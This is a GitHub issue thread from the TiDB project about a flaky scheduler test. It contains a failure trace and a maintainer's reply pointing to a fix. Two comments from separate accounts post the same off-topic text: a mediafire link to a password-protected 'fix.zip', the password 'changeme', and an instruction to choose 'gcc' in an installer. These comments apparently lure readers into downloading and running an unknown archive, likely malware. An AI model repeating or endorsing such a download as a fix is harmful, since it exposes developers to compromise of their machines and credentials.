### ISSUE TITLE
flaky test TestParallelCancel

### ISSUE THREAD

**Issue by D3Hunter** [pingcap/tidb#55658]
## Bug Report

Please answer these questions before submitting your issue. Thanks!

### 1. Minimal reproduce step (Required)

local debug can reproduce it, 1 out of 3 runs
```
    scheduler_test.go:253: 
        	Error Trace:	pkg/disttask/framework/scheduler/scheduler_test.go:253
        	            				pkg/disttask/framework/scheduler/scheduler_test.go:315
        	            				pkg/disttask/framework/scheduler/scheduler_test.go:355
        	Error:      	"60" is not less than "60"
        	Test:       	TestParallelCancel
```

### 2. What did you expect to see? (Required)
success
### 3. What did you see instead (Required)
fail
### 4. What is your TiDB version? (Required)
master

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by D3Hunter** [comment]
TestRenewLeaseABAFailPoint  has already fixed by https://github.com/pingcap/tidb/pull/55620
